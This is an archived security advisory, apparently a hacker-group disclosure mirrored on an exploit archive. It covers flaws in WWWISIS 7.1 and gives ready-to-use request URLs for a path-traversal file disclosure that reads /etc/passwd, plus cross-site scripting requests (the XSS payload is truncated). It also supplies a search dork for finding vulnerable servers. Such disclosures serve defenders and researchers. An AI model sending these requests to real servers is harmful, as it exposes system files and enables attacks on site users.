AOH :: HP Unsorted W :: TB13005.HTM

WWWISIS <= 7.1 (IsisScript) Multiple Vulnerabilities



WWWISIS <= 7.1 (IsisScript) Multiple Vulnerabilities
WWWISIS <= 7.1 (IsisScript) Multiple Vulnerabilities



# WWWISIS <= 7.1 (IsisScript) Multiple Vulnerabilities
# Download:
# http://bvsmodelo.bvsalud.org/php/level.php?lang=en&component=31&item=2 
# Bug found by JosS / Jose Luis Góngora Fernández
# Contact: sys-project[at]hotmail.com
# Spanish Hackers Team
# www.spanish-hackers.com 
# /server irc.freenode.net /join #fullsecure
# d0rk: powered by WWWISIS
# Stop lammer


# Local File Disclosure Vulnerability:

http://server/cgi-bin/wxis.exe/iah/?IsisScript=[file] 
http://server/cgi-bin/wxis.exe/iah/?IsisScript=../../../../../../../../../etc/passwd 


# Exploit In (XSS):

http://server/cgi-bin/wxis.exe/iah/?IsisScript=iah/iah.xis&base=article%5Edlibrary&fmt=iso.pft&lang=i 
http://server/cgi-bin/wxis.exe/iah/?IsisScript=iah/iah.xis&base=article%5Edlibrary&fmt=iso.pft&lang=e 
....

[ i,e ... ] it is the language of script

# Cross Siting Scripting:


">


//---------------------------------------\\

Greetz To: All Hackers
JosS! / Jose Luis Góngora Fernández

_________________________________________________________________
Horóscopo, tarot, numerología... Escucha lo que te dicen los astros. 
http://astrocentro.msn.es/ 


The entire AOH site is optimized to look best in Firefox® 3 on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2014 AOH
We do not send spam. If you have received spam bearing an artofhacking.com email address, please forward it with full headers to abuse@artofhacking.com.